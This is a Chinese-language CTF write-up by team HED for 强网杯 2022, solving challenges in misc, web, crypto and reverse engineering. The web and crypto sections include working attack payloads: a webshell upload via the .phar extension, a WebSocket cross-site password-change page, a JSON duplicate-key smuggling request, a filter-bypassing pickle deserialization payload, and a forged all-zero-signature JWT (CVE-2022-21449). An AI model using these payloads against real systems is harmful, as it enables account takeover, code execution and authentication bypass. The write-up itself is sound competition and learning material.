强网杯2022-HED-WriteUp
Rank: 74 708pts 10Solved
HED 是南方科技大学COMPASS实验室的CTF战队
解题情况(全部10题):
- 强网杯2022-HED-WirteUp
- MISC
- 签到-Misc-8
- 问卷调查-Misc-27
- 谍影重重(二血)-Misc-271
- 强网先锋
- rcefile-强网先锋-24
- ASR-强网先锋-68
- polydiv-强网先锋-48
- Web
- babyweb-Web-44
- crash-Web-76
- Reverse
- GameMaster-Reverse-80
- Crypto
- myJWT-Crypto-62
MISC
签到-Misc-8
签到
问卷调查-Misc-27
问卷
谍影重重(二血)-Misc-271
首先看 config.json 的内容,发现很像 v2ray 的配置文件,于是手搓 VMess 协议。这部分没啥好说的,就看规范和代码直接对着实现一遍,确实硬核。
import hmac
import hashlib
from Crypto.Hash import SHAKE128
from Crypto.Cipher import AES
uuid = bytes.fromhex('b831381d63244d53ad4f8cda48b30811') # 取自 config.json
def get_timestamp(f):
correct = f.read(16)
t0 = 1615528962 # 取自 pcap 的时间
for t in range(t0 - 60, t0 + 60):
h = hmac.new(uuid, int.to_bytes(t, 8, byteorder='big'), digestmod='MD5')
if h.digest() == correct:
return t
def decode_send_header(f, t):
key = hashlib.md5(uuid + b'c48619fe-8f02-49e0-b9e9-edf763e17e21').digest()
iv = hashlib.md5(int.to_bytes(t, 8, byteorder='big') * 4).digest()
cipher = AES.new(key, AES.MODE_CFB, iv=iv, segment_size=AES.block_size*8)
header = cipher.decrypt(f.read(38))
iv = header[1:17]
key = header[17:33]
return iv, key
def decode_recv_data(f, iv, key):
iv = hashlib.md5(iv).digest()
key = hashlib.md5(key).digest()
shade = SHAKE128.new(data=iv)
f.seek(4)
data = b''
count = 0
while True:
padding = int.from_bytes(shade.read(2), byteorder='big') % 64
length = int.from_bytes(f.read(2), byteorder='big') ^ int.from_bytes(shade.read(2), byteorder='big')
if length - padding == 16:
break
chunk = f.read(length)
if padding > 0:
chunk = chunk[:-padding]
chunk_iv = int.to_bytes(count, 2, byteorder='big') + iv[2:12]
cipher = AES.new(key, AES.MODE_GCM, chunk_iv)
chunk = cipher.decrypt_and_verify(chunk[:-16], chunk[-16:])
data += chunk
count += 1
return data
if __name__ == '__main__':
with open('send.dat', 'rb') as f:
t = get_timestamp(f)
iv, key = decode_send_header(f, t)
with open('recv.dat', 'rb') as f:
data = decode_recv_data(f, iv, key)
with open('content.txt', 'wb') as f:
f.write(data)
然后发现是一个 HTTP 请求,把 html 里面的东西保存,得到了一个 0208_54741869750132.doc。
doc文档下载后火绒报毒不断,分离出的dll文件看起来并不简单,考虑到大概率要提取宏病毒中的API地址,直接把文件上传到微步云沙箱分析行为,发现是真的病毒(https://s.threatbook.com/report/file/3a5648f7de99c4f87331c36983fc8adcd667743569a19c8dafdd5e8a33de154d)
同时在样本报告里找到了api地址 api.ipify.org
(看起来并不是只有我们是这样做的,写wp时发现7月31又被上传了几次)
解压后拿到一个自称是GOB文件的二进制,怀疑是go的序列化对象或者是游戏资源文件,把文件头8字节十六进制放到谷歌里可以搜到一个github的poc仓库,因此确认该文件是go的打包文件。
用 pygob 读取,里面有时间戳 2022-07-19 14:49:56 和一个所谓的 PNG 文件,但是这个 PNG 打不开。
然后根据提示(~~唯一有用的提示~~),这个文件打乱过。然后因为有时间,所以可以考虑用时间作为种子,把这个随机过程还原。
func main() {
rand.Seed(1658213396) // 2022-07-19 14:49:56
raw, err := os.ReadFile("p.png")
len := len(raw)
mapping := make([]int, len)
data := make([]byte, len)
for i := 0; i < len; i++ {
mapping[i] = i
}
rand.Shuffle(len, func(i, j int) {
mapping[i], mapping[j] = mapping[j], mapping[i]
})
for i := 0; i < len; i++ {
data[mapping[i]] = raw[i]
}
f, err := os.Create("q.png")
f.Write(data)
}
然后还原之后,就得到了一张正常的 PNG 图片。不过里面也不直接是 flag。经过观察,图片的白色部分和蓝色部分都是全白或全蓝,没有信息。不过字的边缘有点意思。经过尝试,发现排除全白和全蓝像素之后,把 alpha 的数据直接提取拼接之后,就是 flag 了。
from PIL import Image
img = Image.open('q.png')
for x in img.getdata():
if x != (255, 255, 255, 255) and x != (0, 0, 255, 255):
print(hex(x[3])[2:], end='')
# 然后把输出 hex 解码一下即可
强网先锋
(推测强网先锋是难度较低的题目,但是分类未知)
rcefile-强网先锋-24
私有环境,猜测需要简单扫描,御剑尝试100条常见路径发现www.zip源码。
上传文件后缀过滤很严格,且没什么绕过的机会,前边也被拼接了md5,不能传.htacess
于是把所有php合法扩展名都试一遍(https://book.hacktricks.xyz/pentesting-web/file-upload) ,发现phps文件会403,继续测试剩余扩展名发现phar文件可以解析。
传马,结束。
ASR-强网先锋-68
factordb只能获得开方的结果。
分解四个128位质数的乘积应该并不复杂,放到yafu里单线程跑不到一小时就能出来
SIQS elapsed time = 8.5662 seconds.
Total factoring time = 2415.3993 seconds
P39 = 223213222467584072959434495118689164399
P39 = 260594583349478633632570848336184053653
P39 = 218566259296037866647273372633238739089
P39 = 225933944608558304529179430753170813347
e和phi不互素,数理基础匮乏的我们并没有用phi = (p-1)*(q-1)*(r-1)*(s-1)*p*q*r*s梭出答案
在 https://www.modb.pro/db/404740 的讨论中找到能用的脚本,抄过来改少一个因子
sage部分
n = p * q * r * s * p * q * r * s
e = 3
print(n)
phi = (p - 1) * (q - 1) * (r - 1) * (s - 1)
R.<x> = Zmod(p)[]
f = x ^ e - c
f = f.monic()
res1 = f.roots()
R.<x> = Zmod(q)[]
f = x ^e - c
f = f.monic()
res2 = f.roots()
R.<x> = Zmod(r)[]
f = x ^e - c
f = f.monic()
res3 = f.roots()
R.<x> = Zmod(s)[]
f = x ^e - c
f = f.monic()
res4 = f.roots()
print(res1,res2,res3,res4,sep='\n')
python部分
res1=[(61230132932186378005663689217798805559, 1)]
res2=[(127287570627900634195349274487282947698, 1)]
res3=[(159183122833201520722281740271702531008, 1), (54017009972585088360569997378772209006, 1), (5366126490251257564421634982763999075, 1)]
res4=[(97828969479259149226856141068289169207, 1), (84132055525449472521332928867042183796, 1), (43972919603849682780990360817839460344, 1)]
def union(x1, x2):
a1, m1 = x1
a2, m2 = x2
d = gmpy2.gcd(m1, m2)
assert (a2 - a1) % d == 0
p1, p2 = m1 // d, m2 // d
_, l1, l2 = gmpy2.gcdext(p1, p2)
k = -((a1 - a2) // d) * l1
lcm = gmpy2.lcm(m1, m2)
ans = (a1 + k * m1) % lcm
return ans, lcm
def excrt(ai, mi):
tmp = zip(ai, mi)
return reduce(union, tmp)
for i in res1:
for j in res2:
for k in res3:
for l in res4:
ai = [i[0], j[0], k[0], l[0]]
# print(ai)
mi = [p, q, r, s]
flag = excrt(ai, mi)
flag = hex(flag[0])
try:
print(bytes.fromhex(flag[2:]))
except:
...
polydiv-强网先锋-48
给出等式 $a(x) \times b(x) + c(x) = r(x)$,并给出多项式 $a(x), c(x), r(x)$,求 $b(x)$。
移一下项,得到 $b(x) = \big( r(x) - c(x) \big) \div a(x)$,前面减法部分很 trivial,后面除法的部分,因为已知能整除,所以直接上多项式除法即可。
from pwn import *
import hashlib
import itertools
conn = remote('IP', PORT)
def proof():
line = conn.recvline().decode().strip()
conn.recv()
hexdigest = line.split(' == ')[1]
suffix = line[12:28]
charset = string.ascii_letters + string.digits
for x in itertools.product(charset, repeat=4):
plain = ''.join(x) + suffix
if hashlib.sha256(plain.encode()).hexdigest() == hexdigest:
conn.sendline(''.join(x))
def decode_poly(line):
line = line.split(' = ')[1]
arr = None
for item in line.split(' + '):
p = 0 if item == '1' else (1 if item == 'x' else int(item[2:]))
if arr is None:
arr = [ 0 for _ in range(p + 1) ]
arr[p] = 1
return arr
def poly_add(x, y):
if len(x) < len(y):
x, y = y, x
x = x[:]
for i in range(len(y)):
x[i] = (x[i] + y[i]) % 2
return x
def poly_div(x, y): # x / y
x = x[:]
b = [ 0 for _ in range(len(x)) ]
low = min([ i for i, v in enumerate(y) if v == 1 ])
for i in range(len(x) - low):
c_pos = i + low
if x[c_pos] != 0:
b[i] = 1
for j in range(len(y)):
x[i + j] = (x[i + j] + y[j]) % 2
return b
def solve():
pr = decode_poly(conn.recvline().decode().strip())
pa = decode_poly(conn.recvline().decode().strip())
pc = decode_poly(conn.recvline().decode().strip())
conn.recvline() # Please give me the b(x) which satisfy a(x)*b(x)+c(x)=r(x)
conn.recv() # > b(x) =
pb = poly_div(poly_add(pr, pc), pa)
terms = []
for i, v in list(enumerate(pb))[::-1]:
if v != 0:
terms.append('1' if i == 0 else ('x' if i == 1 else f'x^{i}'))
conn.send(' + '.join(terms))
print(conn.recvline()) # Success!
if __name__ == '__main__':
proof()
for _ in range(40):
solve()
conn.interactive()
Web
babyweb-Web-44
这个 bot 的主要功能就是可以用 bugreport http://host:port/login 这条指令,让服务器访问这个网站。经过测试,它是可以运行 JavaScript 的。
然后发现 admin 已经被注册了,不过我们可以尝试修改它的密码,然后尝试登录。从题面的 docker 命令可以知道它在本地的端口是 8888,所以构造一个 html 文件,来向 127.0.0.1 发送修改密码指令:
<html><body><script>
ws = new WebSocket('ws://127.0.0.1:8888/bot');
ws.onopen = function() {
ws.send('changepw 123456');
}
</script></body></html>
然后修改完之后用 admin 和 123456 登录,就可以到一个购物小车的后台。然后发现只有 200$,买不了 flag。不过通过观察源码,可以知道购买的逻辑分布在两个不同的后端中,其中一个检查金钱够不够,另外一个将买到的东西加入到用户属性中。所以就可以尝试走私,让「检查金钱」的觉得不用买,通过检查,让「买东西」的可以成功买到东西。经测试,下面的 payload 可以成功走私:
{
"product":[{"id":1,"num":0},{"id":2,"num":0}],
"product":[{"id":1,"num":1},{"id":2,"num":1}]
}
crash-Web-76
观察源码:
@app.route('/balancer', methods=['GET', 'POST'])
def flag():
pickle_data=base64.b64decode(request.cookies.get("userdata"))
if b'R' in pickle_data or b"secret" in pickle_data:
return "You damm hacker!"
userdata=pickle.loads(pickle_data)
if userdata.token!=hash(get_password(userdata.username)):
return "Login First"
if userdata.username=='admin':
return "Welcome admin, here is your next challenge!"
return "You're not admin!"
一眼看上去就是 pickle 反序列化利用。但是这里禁用了 R 指令,不过问题不大,这里可以直接用 o 来平替。即 <func>(<args>tR 等价于 (<func><args>o。把 pker.py 脚本简单修改一下之后就能拿来用了。
(这里队内的M神已经RCE了,但是发现没权限读nginx的配置文件,环境也是很新的好像并没有什么提权的机会)
然后下一步就是让 token != hash(...) 为 False,这个我一开始尝试从 app.get_password 和 admin.secret 拿密码,但是拿不到。所以尝试将 token 变成一个对象,然后把这个对象的 __ne__ hack 为永远返回 False。
下为 payload:~~发现不知道为啥不需要绕 secret,不过要绕过也很简单,拿 str.__add__ 绕即可~~
partial = GLOBAL('functools', 'partial')
getattr = GLOBAL('__builtin__', 'getattr')
OrderedDict = GLOBAL('collections', 'OrderedDict')
startswith = getattr(GLOBAL('__builtin__', 'str'), 'startswith')
User = GLOBAL('app', 'User')
false = partial(startswith, '1', '2')
user.__ne__ = false
forever_ne = User('1', '2')
data = OrderedDict()
data.token = forever_ne
data.username = 'admin'
return data
然后这个 payload 扔上去之后就进到了一个均衡负载页面。结合时事(指某垃圾二次元视频网站的事故分析),发现把 weight 设置成 0 可以让 gcd 函数死循环,最终 504 从而拿到 flag。
Reverse
GameMaster-Reverse-80
GitHub可以根据运行时的标题搜到原始的仓库,对照dnspy的结果简单看一下是多了一个大的后门函数,以及dll多了一个gencode,但是并没有用到。
exe里的后门函数有三个checkpoint,第一步取出message数据,第二步xor 34,第三步AES-ECB解密,密钥Brainstorming!!!
解密的文件前半段被赛博厨子识别为ttf字体,但是后半段显然有函数,导出给binwalk看一下被告知后半段有exe,但是没有自动分离出来,手动找到mz头分离出发现还是.net程序,继续给dnspy分析,定位到校验flag的函数,x y z三个ULONG变量未知,结果已知,flag密文已知,求得xyz即可获得解密密钥。
结果的40个byte的每一位对应一轮的result,于是队友M神直接给Z3丢了320个约束条件,10秒就跑出来了xyz。
(怎么klee跑了10分钟都没结果呢。STP和Z3差距这么大吗)
import z3
def rotate():
global x, y, z
x = ((((x >> 29) ^ (x >> 28) ^ (x >> 25) ^ (x >> 23)) & 1) | (x << 1)) & 0xFFFFFFFFF
y = ((((y >> 30) ^ (y >> 27)) & 1) | (y << 1)) & 0xFFFFFFFFF
z = ((((z >> 31) ^ (z >> 30) ^ (z >> 29) ^ (z >> 28) ^ (z >> 26) ^ (z >> 24)) & 1) | (z << 1)) & 0xFFFFFFFFF
def summary():
global x, y, z
return ((((z >> 32) & 1) & ((x >> 30) & 1)) ^ ((((z >> 32) & 1) ^ 1) & ((y >> 31) & 1))) & 1
x0, y0, z0 = z3.BitVecs('x y z', 33)
x, y, z = x0, y0, z0
bits = [0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1]
s = z3.Solver()
for i in range(320):
rotate()
s.add(summary() == bits[i])
s.check()
model = s.model()
print(model)
array = [ model[x0].as_long(), model[y0].as_long(), model[z0].as_long() ]
key = [ 0 for _ in range(12) ]
ciphertext = [60, 100, 36, 86, 51, 251, 167, 108, 116, 245, 207, 223, 40, 103, 34, 62, 22, 251, 227]
for i in range(3):
for j in range(4):
key[i * 4 + j] = (array[i] >> (j * 8)) & 0xFF
for i in range(len(ciphertext)):
ciphertext[i] = ciphertext[i] ^ key[i % 12]
print(bytes(ciphertext))
Crypto
myJWT-Crypto-62
没给出fastjson的版本,结合题目描述 misc&crypto 且是公共环境,考虑并不是最新的反序列化,那就只剩java自己的库。
CVE-2022-21449
java验证:
var keys = KeyPairGenerator.getInstance("EC").generateKeyPair();
var blankSignature = new byte[64]; // 默认是0
var sig = Signature.getInstance("SHA256WithECDSAInP1363Format");
sig.initVerify(keys.getPublic());
sig.update("admin:False".getBytes());
System.out.println(sig.verify(blankSignature));
签名全是0可以永远通过校验,jwt exp:
eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiZnJhbmsiLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxODU5MjM1NjAwNzYwfQ==.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==